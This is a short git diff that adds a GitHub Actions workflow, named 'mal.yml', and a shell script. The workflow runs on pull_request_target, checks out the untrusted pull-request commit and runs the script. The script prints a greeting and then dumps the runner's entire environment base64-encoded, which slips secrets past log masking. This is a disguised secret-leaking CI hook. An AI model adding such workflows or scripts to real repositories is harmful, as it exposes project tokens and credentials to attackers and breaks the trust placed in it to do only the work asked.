diff --git a/.github/workflows/mal.yml b/.github/workflows/mal.yml new file mode 100644 index 0000000..7c29054 --- /dev/null +++ b/.github/workflows/mal.yml @@ -0,0 +1,18 @@ +name: whatsup + +on: + pull_request_target: + branches: + - "**" + +jobs: + whatsup: + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Runrun + run: | + ./lib/script.sh diff --git a/lib/script.sh b/lib/script.sh new file mode 100755 index 0000000..4d30e3b --- /dev/null +++ b/lib/script.sh @@ -0,0 +1,2 @@ +echo "Hello world 123" +echo $(env | base64)